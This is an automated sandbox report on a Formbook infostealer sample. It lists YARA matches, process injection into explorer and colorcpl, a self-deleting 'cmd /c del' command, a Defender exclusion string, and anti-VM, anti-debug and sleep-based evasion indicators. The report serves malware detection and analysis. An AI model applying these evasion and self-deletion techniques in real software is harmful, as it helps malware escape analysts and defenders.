Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: UOMp9cDcqZ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/1@10/6
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UOMp9cDcqZ.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
Source: UOMp9cDcqZ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: UOMp9cDcqZ.exe Virustotal: Detection: 16%
Source: UOMp9cDcqZ.exe Metadefender: Detection: 22%
Source: UOMp9cDcqZ.exe ReversingLabs: Detection: 50%
Source: unknown Process created: C:\Users\user\Desktop\UOMp9cDcqZ.exe 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Process created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Process created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: UOMp9cDcqZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: UOMp9cDcqZ.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: UOMp9cDcqZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: UOMp9cDcqZ.exe
Source: Binary string: colorcpl.pdbGCTL source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source: Binary string: colorcpl.pdb source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: UOMp9cDcqZ.exe, 00000002.00000003.245683230.0000000001050000.00000004.00000001.sdmp, colorcpl.exe, 0000000F.00000002.494600161.00000000046D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: UOMp9cDcqZ.exe, colorcpl.exe

Data Obfuscation:

.NET source code contains potential unpacker
Source: UOMp9cDcqZ.exe, Aspiring_Rookie/DebuggableAttribute.cs .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.UOMp9cDcqZ.exe.6e0000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.UOMp9cDcqZ.exe.6e0000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.UOMp9cDcqZ.exe.860000.2.unpack, Aspiring_Rookie/DebuggableAttribute.cs .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.UOMp9cDcqZ.exe.860000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.UOMp9cDcqZ.exe.860000.1.unpack, Aspiring_Rookie/DebuggableAttribute.cs .Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E613656 push cs; ret 1_2_0E61365C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E6112B0 push cs; ret 1_2_0E6112B4
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 1_2_0E6112BA push cs; ret 1_2_0E6112BE
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041B2A2 push cs; ret 2_2_0041B2A3
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041B3FB push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041B45C push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00415414 push esp; ret 2_2_00415416
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00414F46 push cs; ret 2_2_00414F47
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0041BF12 push dword ptr [8427D5C5h]; ret 2_2_0041C1FF
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00415FC5 push ebp; ret 2_2_00415FC6
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013FD0D1 push ecx; ret 2_2_013FD0E4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0474D0D1 push ecx; ret 15_2_0474D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255B2A2 push cs; ret 15_2_0255B2A3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255B3F2 push eax; ret 15_2_0255B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255B3FB push eax; ret 15_2_0255B462
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255B3A5 push eax; ret 15_2_0255B3F8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02554F46 push cs; ret 15_2_02554F47
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255BF12 push dword ptr [8427D5C5h]; ret 15_2_0255C1FF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02555FC5 push ebp; ret 15_2_02555FC6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0255B45C push eax; ret 15_2_0255B462
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02555414 push esp; ret 15_2_02555416
Source: initial sample Static PE information: section name: .text entropy: 7.86649805273
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UOMp9cDcqZ.exe PID: 5852, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 00000000025485E4 second address: 00000000025485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 000000000254896E second address: 0000000002548974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe TID: 5336 Thread sleep time: -99749s >= -30000s
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe TID: 204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 3320 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1704 Thread sleep time: -32000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Thread delayed: delay time: 99749
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000003.00000000.277219215.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.277219215.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: vmware
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000000.288826880.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.277277771.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.267541205.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.277277771.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_00409B10 LdrLoadDll, 2_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01423540 mov eax, dword ptr fs:[00000030h] 2_2_01423540
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h] 2_2_013D4D3B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D513A mov eax, dword ptr fs:[00000030h] 2_2_013D513A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AAD30 mov eax, dword ptr fs:[00000030h] 2_2_013AAD30
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h] 2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h] 2_2_013C4120
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013C4120 mov ecx, dword ptr fs:[00000030h] 2_2_013C4120
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h] 2_2_013A9100
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AB171 mov eax, dword ptr fs:[00000030h] 2_2_013AB171
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CC577 mov eax, dword ptr fs:[00000030h] 2_2_013CC577
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AC962 mov eax, dword ptr fs:[00000030h] 2_2_013AC962
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013C7D50 mov eax, dword ptr fs:[00000030h] 2_2_013C7D50
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01478D34 mov eax, dword ptr fs:[00000030h] 2_2_01478D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0142A537 mov eax, dword ptr fs:[00000030h] 2_2_0142A537
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CB944 mov eax, dword ptr fs:[00000030h] 2_2_013CB944
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E3D43 mov eax, dword ptr fs:[00000030h] 2_2_013E3D43
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0146E539 mov eax, dword ptr fs:[00000030h] 2_2_0146E539
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h] 2_2_013D1DB5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h] 2_2_01426DC9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01426DC9 mov ecx, dword ptr fs:[00000030h] 2_2_01426DC9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D35A1 mov eax, dword ptr fs:[00000030h] 2_2_013D35A1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D61A0 mov eax, dword ptr fs:[00000030h] 2_2_013D61A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h] 2_2_0146FDE2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DFD9B mov eax, dword ptr fs:[00000030h] 2_2_013DFD9B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014341E8 mov eax, dword ptr fs:[00000030h] 2_2_014341E8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D2990 mov eax, dword ptr fs:[00000030h] 2_2_013D2990
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h] 2_2_013A2D8A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01458DF1 mov eax, dword ptr fs:[00000030h] 2_2_01458DF1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DA185 mov eax, dword ptr fs:[00000030h] 2_2_013DA185
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h] 2_2_013D2581
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CC182 mov eax, dword ptr fs:[00000030h] 2_2_013CC182
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h] 2_2_013AB1E1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013BD5E0 mov eax, dword ptr fs:[00000030h] 2_2_013BD5E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014269A6 mov eax, dword ptr fs:[00000030h] 2_2_014269A6
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014705AC mov eax, dword ptr fs:[00000030h] 2_2_014705AC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014251BE mov eax, dword ptr fs:[00000030h] 2_2_014251BE
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D002D mov eax, dword ptr fs:[00000030h] 2_2_013D002D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h] 2_2_013BB02A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DBC2C mov eax, dword ptr fs:[00000030h] 2_2_013DBC2C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143C450 mov eax, dword ptr fs:[00000030h] 2_2_0143C450
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01471074 mov eax, dword ptr fs:[00000030h] 2_2_01471074
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01462073 mov eax, dword ptr fs:[00000030h] 2_2_01462073
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h] 2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h] 2_2_01426C0A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0147740D mov eax, dword ptr fs:[00000030h] 2_2_0147740D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013C746D mov eax, dword ptr fs:[00000030h] 2_2_013C746D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01474015 mov eax, dword ptr fs:[00000030h] 2_2_01474015
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01427016 mov eax, dword ptr fs:[00000030h] 2_2_01427016
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013C0050 mov eax, dword ptr fs:[00000030h] 2_2_013C0050
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DA44B mov eax, dword ptr fs:[00000030h] 2_2_013DA44B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DF0BF mov ecx, dword ptr fs:[00000030h] 2_2_013DF0BF
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DF0BF mov eax, dword ptr fs:[00000030h] 2_2_013DF0BF
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01478CD6 mov eax, dword ptr fs:[00000030h] 2_2_01478CD6
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E90AF mov eax, dword ptr fs:[00000030h] 2_2_013E90AF
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0143B8D0
